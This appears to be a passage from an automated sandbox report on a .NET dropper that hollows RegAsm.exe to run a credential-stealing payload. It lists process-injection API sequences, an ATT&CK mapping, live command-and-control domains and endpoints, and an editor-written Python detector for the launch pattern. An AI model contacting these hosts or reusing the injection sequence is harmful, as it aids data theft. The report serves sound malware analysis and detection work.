    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040E470
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00405400
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00411420
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042D56C
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042D58E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00437620
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409737
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00403790
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004327B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042C891
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00449970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00409A02
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00445AD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00449B60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042BB00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00427B0F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00438C00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0043FD0E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00407E70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042DEF8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0043EF50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040AFD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0042DFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_0040BF80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00448F80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0040CAD0 appears 52 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0040ED80 appears 194 times
    Source: a7HdB2dU5P.exe, 00000000.00000002.1693049512.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exe, 00000000.00000000.1678966871.000000000062E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVQP.exe< vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exe | Binary or memory string: OriginalFilenameVQP.exe< vs a7HdB2dU5P.exe
    Source: a7HdB2dU5P.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: a7HdB2dU5P.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/2@11/7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_004381AA CoCreateInstance
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a7HdB2dU5P.exe.log
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
    Source: a7HdB2dU5P.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: a7HdB2dU5P.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: a7HdB2dU5P.exe | ReversingLabs: Detection: 47%
    Source: unknown | Process created: C:\Users\user\Desktop\a7HdB2dU5P.exe "C:\Users\user\Desktop\a7HdB2dU5P.exe"
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
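The process rows above show the dropper, running from the user's Desktop, starting RegAsm.exe with a command line that is nothing but the image path. Together with the "Creates a process in suspended mode", "Allocates memory in foreign processes" and "Writes to foreign memory regions" signatures in the overview, that is the process-hollowing pattern by which the .NET loader hands control to the native Lumma payload. The example below is added for this page and is not Joe Sandbox or Sysmon code; it applies that logic to constructed events in Sysmon-like shape (process creation, event 1, and process access, event 10). PIDs, timestamps and the benign control event are invented, and the set of .NET utilities treated as hollowing targets is the editor's choice.

```python
# Added example: flag the argument-less RegAsm.exe launch seen in this report
# and correlate it with a process-access event. Editor-written illustration,
# not Joe Sandbox or Sysmon code. The events are constructed in Sysmon-like
# shape; PIDs, timestamps and the benign control event are invented.
from datetime import datetime, timedelta

# .NET Framework utilities that need an assembly path to do anything useful and
# are therefore suspicious when started with an empty command line (editor's list).
HOLLOW_TARGETS = frozenset({
    "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe",
})
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Rights a writer into another process needs: PROCESS_CREATE_THREAD (0x2),
# PROCESS_VM_OPERATION (0x8) and PROCESS_VM_WRITE (0x20).
WRITE_RIGHTS = 0x2 | 0x8 | 0x20


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def no_arguments(image, cmdline):
    """True when the command line is just the image path, quoted or not."""
    return cmdline.strip().strip('"').lower() == image.lower()


def suspicious_launch(ev):
    """Event 1 where a hollowing target is started argument-less by a parent
    that runs from a user-writable directory."""
    return (ev["id"] == 1
            and basename(ev["image"]) in HOLLOW_TARGETS
            and no_arguments(ev["image"], ev["cmdline"])
            and ev["parent_image"].lower().startswith(USER_WRITABLE))


def correlate(events, window=timedelta(seconds=30)):
    """Return (parent, child, confidence) per suspicious launch. Confidence is
    'high' when the parent also opened the child with write/thread rights
    (event 10) within the window, otherwise 'medium'."""
    findings = []
    for launch in (e for e in events if suspicious_launch(e)):
        confidence = "medium"
        for ev in events:
            if (ev["id"] == 10
                    and ev["source_pid"] == launch["parent_pid"]
                    and ev["target_pid"] == launch["pid"]
                    and ev["granted_access"] & WRITE_RIGHTS
                    and launch["time"] <= ev["time"] <= launch["time"] + window):
                confidence = "high"
                break
        findings.append((basename(launch["parent_image"]), basename(launch["image"]), confidence))
    return findings


T0 = datetime(2024, 9, 26, 12, 0, 0)  # constructed timestamp
DROPPER = "C:\\Users\\user\\Desktop\\a7HdB2dU5P.exe"
REGASM = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
SAMPLE_EVENTS = [
    {"id": 1, "time": T0, "pid": 5000, "parent_pid": 4800,
     "image": "C:\\Windows\\System32\\conhost.exe",
     "cmdline": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
     "parent_image": DROPPER},
    {"id": 1, "time": T0 + timedelta(seconds=1), "pid": 5100, "parent_pid": 4800,
     "image": REGASM, "cmdline": f'"{REGASM}"', "parent_image": DROPPER},
    {"id": 10, "time": T0 + timedelta(seconds=1), "source_pid": 4800,
     "target_pid": 5100, "granted_access": 0x1FFFFF},
    # Benign control: an installer registering a COM-visible assembly.
    {"id": 1, "time": T0 + timedelta(minutes=5), "pid": 7000, "parent_pid": 6990,
     "image": REGASM,
     "cmdline": f'"{REGASM}" /codebase "C:\\Program Files\\Vendor\\Interop.dll"',
     "parent_image": "C:\\Program Files\\Vendor\\setup.exe"},
]

if __name__ == "__main__":
    for parent, child, confidence in correlate(SAMPLE_EVENTS):
        print(f"{parent} -> {child}: {confidence}")
```

The launch rule is alertable on its own: RegAsm.exe, RegSvcs.exe and InstallUtil.exe take a mandatory assembly path, so an argument-less start from a parent in a user-writable path is rarely legitimate. The event 10 correlation only raises confidence, and it carries a caveat: Sysmon records ProcessAccess when a process opens another process, while a parent that created the child itself already holds a full-access handle from CreateProcess and may produce no event 10 at all, which is why the rule does not require one.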
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
    Source: a7HdB2dU5P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: a7HdB2dU5P.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: a7HdB2dU5P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 2_2_00437333 push 04EC839Eh; mov dword ptr [esp], edi (2_2_0043733A)
    Source: a7HdB2dU5P.exeStatic PE information: section name: .text entropy: 7.995621110986315
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: C60000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe TID: 6544Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegAsm.exe, 00000002.00000002.1795323805.0000000001265000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00447560 LdrInitializeThunk,2_2_00447560
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Code function: 0_2_028C2145 GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, CreateProcessA, CreateProcessA, VirtualAlloc, VirtualAlloc, GetThreadContext, Wow64GetThreadContext, ReadProcessMemory, ReadProcessMemory, VirtualAllocEx, VirtualAllocEx, GetProcAddress, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, WriteProcessMemory, SetThreadContext, Wow64SetThreadContext, ResumeThread, ResumeThread (0_2_028C2145)
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: reinforcenh.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: stogeneratmns.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: fragnantbui.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: drawzhotdog.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: vozmeatillu.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: offensivedzvju.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ghostreedmnu.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: gutterydhowi.shop
    Source: a7HdB2dU5P.exe, 00000000.00000002.1694307717.00000000038C5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: lootebarrkeyn.shop
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F4E008
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Users\user\Desktop\a7HdB2dU5P.exe; Queries volume information: C:\Users\user\Desktop\a7HdB2dU5P.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
    MITRE ATT&CK Matrix (matched techniques per tactic, with the hit count shown in the matrix):

    Execution: PowerShell (1)
    Persistence: DLL Side-Loading (1)
    Privilege Escalation: Process Injection (411); DLL Side-Loading (1)
    Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (411); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (2); DLL Side-Loading (1)
    Discovery: Security Software Discovery (1); Virtualization/Sandbox Evasion (31); System Information Discovery (12)
    Collection: Archive Collected Data (1); Clipboard Data (2)
    Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114)
    No matched techniques: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact
    Source | Detection | Scanner | Label
    a7HdB2dU5P.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    https://player.vimeo.com | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/ | 0% | URL Reputation | safe
    https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe
    http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe
    https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe
    https://medal.tv | 0% | URL Reputation | safe
    https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
    https://login.steampowered.com/ | 0% | URL Reputation | safe
    https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
    https://steam.tv/ | 0% | URL Reputation | safe
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Avira URL Cloud | safe
    https://drawzhotdog.shop/api | 100% | Avira URL Cloud | malware
    https://gutterydhowi.shop/api | 100% | Avira URL Cloud | malware
    stogeneratmns.shop | 100% | Avira URL Cloud | malware
    https://performenj.shop/vo | 100% | Avira URL Cloud | malware
    https://offensivedzvju.shop/ | 100% | Avira URL Cloud | malware
    https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware
    lootebarrkeyn.shop | 100% | Avira URL Cloud | malware
    reinforcenh.shop | 100% | Avira URL Cloud | malware
    https://performenj.shop/apiG | 100% | Avira URL Cloud | malware
    http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
    https://store.steampowered.com/ | 0% | URL Reputation | safe
    https://www.youtube.com | 0% | Avira URL Cloud | safe
    https://lv.queniujq.cn | 0% | URL Reputation | safe
    https://drawzhotdog.shop/ | 100% | Avira URL Cloud | malware
    https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware
    https://www.google.com | 0% | Avira URL Cloud | safe
    https://reinforcenh.shop/api2 | 100% | Avira URL Cloud | malware
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP | 0% | Avira URL Cloud | safe
    https://steamcommunity.com/K | 0% | Avira URL Cloud | safe
    https://s.ytimg.com; | 0% | Avira URL Cloud | safe
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a | 0% | Avira URL Cloud | safe
    ghostreedmnu.shop | 100% | Avira URL Cloud | malware
    https://reinforcenh.shop/api | 100% | Avira URL Cloud | malware
    https://reinforcenh.shop/ | 100% | Avira URL Cloud | malware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe
    https://performenj.shop/ | 100% | Avira URL Cloud | malware
    https://sketchfab.com | 0% | Avira URL Cloud | safe
    https://vozmeatillu.shop/api | 100% | Avira URL Cloud | malware
    https://stogeneratmns.shop/api | 100% | Avira URL Cloud | malware
    https://vozmeatillu.shop/Y | 100% | Avira URL Cloud | malware
    https://www.youtube.com/ | 0% | Avira URL Cloud | safe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | Avira URL Cloud | safe
    https://checkout.steampowered.com/ | 0% | URL Reputation | safe
    http://127.0.0.1:27060 | 0% | Avira URL Cloud | safe
    https://help.steampowered.com/ | 0% | URL Reputation | safe
    https://api.steampowered.com/ | 0% | URL Reputation | safe
    http://store.steampowered.com/account/cookiepreferences/ | 0% | URL Reputation | safe
    gutterydhowi.shop | 100% | Avira URL Cloud | malware
    fragnantbui.shop | 100% | Avira URL Cloud | malware
    https://ghostreedmnu.shop/api | 100% | Avira URL Cloud | malware
    https://fragnantbui.shop/api | 100% | Avira URL Cloud | malware
    https://store.steampowered.com/; | 0% | URL Reputation | safe
    https://stogeneratmns.shop/apiD | 100% | Avira URL Cloud | malware
    https://offensivedzvju.shop/api | 100% | Avira URL Cloud | malware
    https://www.google.com/recaptcha/ | 0% | Avira URL Cloud | safe
    https://performenj.shop/G | 100% | Avira URL Cloud | malware
    offensivedzvju.shop | 100% | Avira URL Cloud | malware
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg | 0% | Avira URL Cloud | safe
    https://steamcommunity.com/profiles/76561199724331900/badges | 100% | URL Reputation | malware
    https://performenj.shop/api | 100% | Avira URL Cloud | malware
    drawzhotdog.shop | 100% | Avira URL Cloud | malware
    https://steamcommunity.com/ | 0% | Avira URL Cloud | safe
    vozmeatillu.shop | 100% | Avira URL Cloud | malware
    https://steamcommunity.com/x | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    fragnantbui.shop | 188.114.97.3 | true | true | | unknown
    performenj.shop | 172.67.189.2 | true | true | | unknown
    gutterydhowi.shop | 104.21.4.136 | true | true | | unknown
    steamcommunity.com | 104.102.49.254 | true | false | | unknown
    offensivedzvju.shop | 188.114.96.3 | true | true | | unknown
    stogeneratmns.shop | 188.114.96.3 | true | true | | unknown
    reinforcenh.shop | 104.21.77.130 | true | true | | unknown
    drawzhotdog.shop | 104.21.58.182 | true | true | | unknown
    ghostreedmnu.shop | 188.114.97.3 | true | true | | unknown
    vozmeatillu.shop | 188.114.96.3 | true | true | | unknown
    lootebarrkeyn.shop | unknown | unknown | true | | unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://drawzhotdog.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          lootebarrkeyn.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://gutterydhowi.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          reinforcenh.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          stogeneratmns.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://reinforcenh.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          ghostreedmnu.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://steamcommunity.com/profiles/76561199724331900true
                          • URL Reputation: malware
                          unknown
                          https://vozmeatillu.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          https://stogeneratmns.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          https://ghostreedmnu.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          fragnantbui.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          gutterydhowi.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://offensivedzvju.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          https://fragnantbui.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          offensivedzvju.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          drawzhotdog.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://performenj.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          vozmeatillu.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://player.vimeo.comRegAsm.exe, 00000002.00000002.1795323805.00000000012A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://performenj.shop/voRegAsm.exe, 00000002.00000002.1795323805.00000000012ED000.00000004.00000020.00020000.00000000.sdmptrue
